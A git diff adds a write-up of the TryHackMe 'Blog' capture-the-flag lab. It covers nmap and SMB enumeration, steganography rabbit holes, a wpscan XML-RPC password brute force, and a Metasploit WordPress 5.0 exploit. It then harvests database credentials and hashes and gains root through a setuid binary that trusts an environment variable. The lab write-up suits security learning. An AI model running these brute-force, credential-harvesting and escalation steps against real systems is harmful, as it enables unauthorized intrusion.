diff --git a/TryHackMe/Blog.md b/TryHackMe/Blog.md new file mode 100644 index 0000000..a764a6f --- /dev/null +++ b/TryHackMe/Blog.md @@ -0,0 +1,375 @@ +# TryHackMe-Blog + +## NMAP + +``` +Nmap scan report for 10.10.62.12 +Host is up (0.17s latency). +Not shown: 996 closed ports +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA) +| 256 c2:64:ef:ab:b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA) +|_ 256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519) +80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) +|_http-generator: WordPress 5.0 +| http-robots.txt: 1 disallowed entry +|_/wp-admin/ +|_http-server-header: Apache/2.4.29 (Ubuntu) +|_http-title: Billy Joel's IT Blog – The IT blog +139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) +445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP) +Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Host script results: +|_nbstat: NetBIOS name: BLOG, NetBIOS user: , NetBIOS MAC: (unknown) +| smb-os-discovery: +| OS: Windows 6.1 (Samba 4.7.6-Ubuntu) +| Computer name: blog +| NetBIOS computer name: BLOG\x00 +| Domain name: \x00 +| FQDN: blog +|_ System time: 2020-11-11T18:34:52+00:00 +| smb-security-mode: +| account_used: guest +| authentication_level: user +| challenge_response: supported +|_ message_signing: disabled (dangerous, but default) +| smb2-security-mode: +| 2.02: +|_ Message signing enabled but not required +| smb2-time: +| date: 2020-11-11T18:34:52 +|_ start_date: N/A + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +Nmap done: 1 IP address (1 host up) scanned in 23.80 seconds +``` + +## PORT 139/445 (SMB) + +We know that there are smb shares on this box so let's see which shares we can access + + + +Let's grab the two photos from here and save it on our local machine + +``` +smb: \> get Alice-White-Rabbit.jpg +getting file \Alice-White-Rabbit.jpg of size 33378 as Alice-White-Rabbit.jpg (34.8 KiloBytes/sec) (average 34.8 KiloBytes/sec) +smb: \> get check-this.png +getting file \check-this.png of size 3082 as check-this.png (4.5 KiloBytes/sec) (average 22.3 KiloBytes/sec) +smb: \> + +``` +Now we will see that there is a qr-image so use `zbarimg` to see what text we get from it + + + +``` +root@kali:~/TryHackMe/Medium/Blog# zbarimg check-this.png +QR-Code:https://qrgo.page.link/M6dE +``` +We will get a link that points to a video on youtube `Billy Joel - We Didn't Start the Fire (Official Video)` . + +This seems like a rabbithole .... + +``` +root@kali:~/TryHackMe/Medium/Blog# steghide --extract -sf Alice-White-Rabbit.jpg +Enter passphrase: +wrote extracted data to "rabbit_hole.txt". +root@kali:~/TryHackMe/Medium/Blog# cat rabbit_hole.txt +You've found yourself in a rabbit hole, friend. +root@kali:~/TryHackMe/Medium/Blog# +``` + +And I was right being in the wrong path :D + +## PORT 80 + +Moving on to web page + + + + + +Now your seeing this page like this because we have to add `blog.thm` into our `/etc/hosts/` + + + + +Now it's loading properly + +Looking at `robots.txt` + + + +I found a wordpress login page + + + + +## Gobuster + +`gobuster dir -u http://blog.thm -w /usr/share/wordlists/big.txt` +``` +2020/11/11 23:56:33 Starting gobuster +=============================================================== +/! (Status: 301) +/.htaccess (Status: 403) +/.htpasswd (Status: 403) +/0 (Status: 301) +/0000 (Status: 301) +/2020 (Status: 301) +/admin (Status: 302) +/asdfjkl; (Status: 301) +/atom (Status: 301) +/dashboard (Status: 302) +/embed (Status: 301) +/favicon.ico (Status: 200) +/feed (Status: 301) +/fixed! (Status: 301) +Progress: 9204 / 20470 (44.96% +``` +I didn't find anything interesting with gobuster so doing something with wordpress login page is the only way in + +## WPSCAN + +I used `wpscan` to enumerate for users and wordpress version + +``` +oot@kali:~/TryHackMe/Medium/Blog# wpscan -e --url 10.10.62.12 +_______________________________________________________________ + __ _______ _____ + \ \ / / __ \ / ____| + \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® + \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ + \ /\ / | | ____) | (__| (_| | | | | + \/ \/ |_| |_____/ \___|\__,_|_| |_| + + WordPress Security Scanner by the WPScan Team + Version 3.8.4 + Sponsored by Automattic - https://automattic.com/ + @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart +_______________________________________________________________ + +[+] URL: http://10.10.62.12/ [10.10.62.12] +[+] Started: Thu Nov 12 00:15:15 2020 + +Interesting Finding(s): + +[+] Headers + | Interesting Entry: Server: Apache/2.4.29 (Ubuntu) + | Found By: Headers (Passive Detection) + | Confidence: 100% + +[+] http://10.10.62.12/robots.txt + | Interesting Entries: + | - /wp-admin/ + | - /wp-admin/admin-ajax.php + | Found By: Robots Txt (Aggressive Detection) + | Confidence: 100% + +[+] XML-RPC seems to be enabled: http://10.10.62.12/xmlrpc.php + | Found By: Direct Access (Aggressive Detection) +[i] User(s) Identified: + +[+] bjoel + | Found By: Wp Json Api (Aggressive Detection) + | - http://10.10.62.12/wp-json/wp/v2/users/?per_page=100&page=1 + | Confirmed By: + | Author Id Brute Forcing - Author Pattern (Aggressive Detection) + | Login Error Messages (Aggressive Detection) + +[+] kwheel + | Found By: Wp Json Api (Aggressive Detection) + | - http://10.10.62.12/wp-json/wp/v2/users/?per_page=100&page=1 + | Confirmed By: + | Author Id Brute Forcing - Author Pattern (Aggressive Detection) + | Login Error Messages (Aggressive Detection) + +[+] Karen Wheeler + | Found By: Rss Generator (Aggressive Detection) + +[+] Billy Joel + | Found By: Rss Generator (Aggressive Detection) + +[!] No WPVulnDB API Token given, as a result vulnerability data has not been output. +[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up + +[+] Finished: Thu Nov 12 00:17:18 2020 +[+] Requests Done: 3086 +[+] Cached Requests: 30 +[+] Data Sent: 762.895 KB +[+] Data Received: 1.192 MB +[+] Memory used: 230.801 MB +[+] Elapsed time: 00:02:03 + +``` +And I found two users `bjoel` and `kwheel` lets put this in a text file bruteforce thier passwords + +``` +wpscan --url http://blog.thm -U users.txt -P /usr/share/wordlists/rockyou.txt +_______________________________________________________________ + __ _______ _____ + \ \ / / __ \ / ____| + \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® + \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ + \ /\ / | | ____) | (__| (_| | | | | + \/ \/ |_| |_____/ \___|\__,_|_| |_| + + WordPress Security Scanner by the WPScan Team + Version 3.8.4 + Sponsored by Automattic - https://automattic.com/ + @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart +_______________________________________________________________ + +[+] URL: http://blog.thm/ [10.10.62.12] +[+] Started: Thu Nov 12 00:27:33 2020 + +Interesting Finding(s): + +[+] Headers + | Interesting Entry: Server: Apache/2.4.29 (Ubuntu) + | Found By: Headers (Passive Detection) + | Confidence: 100% + +[+] http://blog.thm/robots.txt + | Interesting Entries: + [+] Enumerating All Plugins (via Passive Methods) + +[i] No plugins Found. + +[+] Enumerating Config Backups (via Passive and Aggressive Methods) + Checking Config Backups - Time: 00:00:01 <=======================================================================> (21 / 21) 100.00% Time: 00:00:01 + +[i] No Config Backups Found. + +[+] Performing password attack on Xmlrpc against 2 user/s +[SUCCESS] - kwheel / cutiepie1 +Trying bjoel / heaven1 Time: 00:07:54 < > (6030 / 28691649) 0.02% +``` + +It took some time but we got `khweel`'s passwords + + + +And now we logged in as `khweel` in wordpress + +Then I did a litte resarch on goole if there's an exploit available for `wordpress 5.0` + + + + +So there's an exploit available for it on `metasploit` + + + +You could also search for it on `searchsploit` and it's going to show up as it's on `exploit-db` + + + +But I will be using metasploit because a tool is available for you why not use it :D + + + +I tried to use it but it kept failing, after quite sometime and restarted metasploit and then the exploit worked + + + +I didn't find anythin in `bjoel`'s home directory I quickly ran `linpeas` + + + + + + +These were the things I found out of linpeas + +``` +define('DB_NAME', 'blog'); +define('DB_USER', 'wordpressuser'); +define('DB_PASSWORD', 'LittleYellowLamp90!@'); +define('DB_HOST', 'localhost'); +``` +Now a mysql database must be ruuning on localhost so lets try to login with these credentials + + + +As we can see `DB_NAME` is `blog` + +``` +mysql> use blog +use blog +Reading table information for completion of table and column names +You can turn off this feature to get a quicker startup with -A + +Database changed +mysql> show tables; +show tables; ++-----------------------+ +| Tables_in_blog | ++-----------------------+ +| wp_commentmeta | +| wp_comments | +| wp_links | +| wp_options | +| wp_postmeta | +| wp_posts | +| wp_term_relationships | +| wp_term_taxonomy | +| wp_termmeta | +| wp_terms | +| wp_usermeta | +| wp_users | ++-----------------------+ +12 rows in set (0.00 sec) + +mysql> + +``` + +I ran command to select all entries in `wp_users` + +``` +mysql> select * from wp_users; +select * from wp_users; ++----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+ +| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name | ++----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+ +| 1 | bjoel | $P$BjoFHe8zIyjnQe/CBvaltzzC6ckPcO/ | bjoel | nconkl1@outlook.com | | 2020-05-26 03:52:26 | | 0 | Billy Joel | +| 3 | kwheel | $P$BedNwvQ29vr1TPd80CDl6WnHyjr8te. | kwheel | zlbiydwrtfjhmuuymk@ttirv.net | | 2020-05-26 03:57:39 | | 0 | Karen Wheeler | ++----+------------+------------------------------------+---------------+------------------------------+----------+---------------------+---------------------+-------------+---------------+ +``` +Let's try cracking these hashes + + + +But this was useless as we already got that password + + + +I then tried to run `/usr/sbin/checker` and it looked like it is customized + + + + +This looks like Buffer Overflow exploitation + + + + +This tells that there's variable that is holds bash variable `$admin`'s value and it's comparing it wheather it's empty or not so you can see that on null value it would terminate so we need to set the value true + +``` +www-data@blog:/media$ export admin=true +export admin=true +www-data@blog:/media$ echo $admin +echo $admin +true +www-data@blog:/media$ /usr/sbin/checker +/usr/sbin/checker +root@blog:/media# + +```